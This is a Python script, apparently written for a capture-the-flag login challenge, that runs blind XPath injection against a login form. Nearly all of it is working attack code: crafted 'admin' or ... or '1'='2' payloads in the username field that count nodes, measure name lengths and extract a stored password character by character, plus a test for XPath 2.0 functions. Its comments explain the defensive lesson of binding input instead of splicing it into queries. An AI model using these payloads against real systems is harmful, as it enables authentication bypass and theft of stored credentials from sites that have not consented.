# http://docs.python-requests.org/en/master/user/quickstart/#make-a-request
import string
import requests
import time
import binascii
import sys
#from urllib import unquote
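# Scratch script used while working a CTF login challenge: each probe below
# builds an XPath expression by concatenating attacker-controlled text into
# the ``username`` field and watches the response to learn one bit at a time.
# From the defender's side this is the textbook reason user input must never
# be spliced into an XPath/XQuery string — bind it as a variable or reject
# quote characters; the injection works only because the server does not.
#
# The pasted source had lost its indentation (the ``for`` body sat at column 0,
# which is an IndentationError), so the structure is restored here.  Every
# payload string is reproduced byte-for-byte.

alphabet = "_{}" + string.digits + string.ascii_letters  # candidate characters; not used below
found = ""          # accumulator for recovered characters; not used below
flag_length = 64    # expected flag length; not used below
url = "https://challenge.acictf.com/problem/27747/login.php"
"""
3 things in database
has 2 sub elements
admin
(blank)
has 0 sub elements
"""

# Positional arguments: <i> is the count/length/offset being tested, <char> is
# the single character compared by the substring() probes.  The original read
# sys.argv[1] and sys.argv[2] unguarded, so a missing argument died with an
# IndexError before anything was sent; fail with a usage line instead.
if len(sys.argv) < 2:
    sys.exit("usage: %s <i> [<char>]" % sys.argv[0])
i = sys.argv[1]
char = sys.argv[2] if len(sys.argv) > 2 else ""

# Requests that hang forever make the script unusable against a slow or
# tarpitting endpoint; every post below uses the same bounded timeout.
REQUEST_TIMEOUT = 10

# The assignments below each overwrite the previous one; they are kept as the
# author's record of the probe sequence (the trailing comment on each line
# says what it was meant to learn).  Only the probe assigned last before a
# requests.post() call is actually sent.
# for name
d = {"username":"admin' or count(/*) = " + str(i) + " or '1'='2", "password":"test"} # see how many things there are
d = {"username":"admin' or count(/*[1]/*) = " + str(i) + " or '1'='2", "password":"test"} # see how many things there are within structure
d = {"username":"admin' or string-length(name(/*[1]/*[1])) = " + str(i) + " or '1'='2", "password":"test"} # find length of name of that entity
d = {"username":"admin' or substring(name(/*[1]/*[2]), " + str(i) + ", 1) = '" + char + "' or '1'='2", "password":"test"} # match character (string, start(1 based), length)
d = {"username":"admin' or string-length(name(/*[1])) = " + str(i) + " or '1'='2", "password":"test"} # go back up 1
d = {"username":"admin' or substring(name(/*[1]), " + str(i) + ", 1) = '" + char + "' or '1'='2", "password":"test"} #
d = {"username":"admin' or string-length(/*[1]/pass/text()) = " + str(i) + " or '1'='2", "password":"test"} # get actual value
d = {"username":"admin' or count(//*) = " + str(i) + " or '1'='2", "password":"test"} # entire database

# Sends the comment-count probe for count = 0..9 and prints each response so
# the one that differs can be picked out by eye.
for count in range(10):
    d = {"username":"admin' or count(//comment()) = " + str(count) + " or '1'='2", "password":"test"}
    # d = {"username":"adin' or string-length(name(//*[3])) = " + str(count) + " or '1'='2", "password":"test"}
    # d = {"username":"adin' or substring(name(//*[1]/*[1]), " + str(count) + ", 1) = '" + sys.argv[2] + "' or '1'='2", "password":"test"}
    r = requests.post(url, data=d, timeout=REQUEST_TIMEOUT)
    print(count)
    print(r.text)
    print(r.status_code)
# NOTE(review): with the indentation lost it is not certain whether this exit
# sat inside the loop (stopping after count = 0) or after it; it is placed after
# the loop so all ten probes run — confirm against the original if needed.
sys.exit()

# Everything from here on is unreachable unless the sys.exit() above is removed;
# the sections are kept as the author's record of earlier experiments.
print("-" * 50)
# for name
d = {"username":"admin' or substring(/*[1]/*[1]/text(), 1, 1) = 'a' or '1'='2", "password":"test"}
r = requests.post(url, data=d, timeout=REQUEST_TIMEOUT)
print(r.text)
print(r.status_code)
sys.exit()

print("-" * 50)
# Test if xpath2, which has more features
d = {"username":"admin' and lower-case('A') = 'a' or '1'='1", "password":"test"}
d = {"username":"admin' and lower-case('A') = \"a\" or '1'='1", "password":"test"}
r = requests.post(url, data=d, timeout=REQUEST_TIMEOUT)
print(r.text)
print(r.status_code)
# https://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-WP.pdf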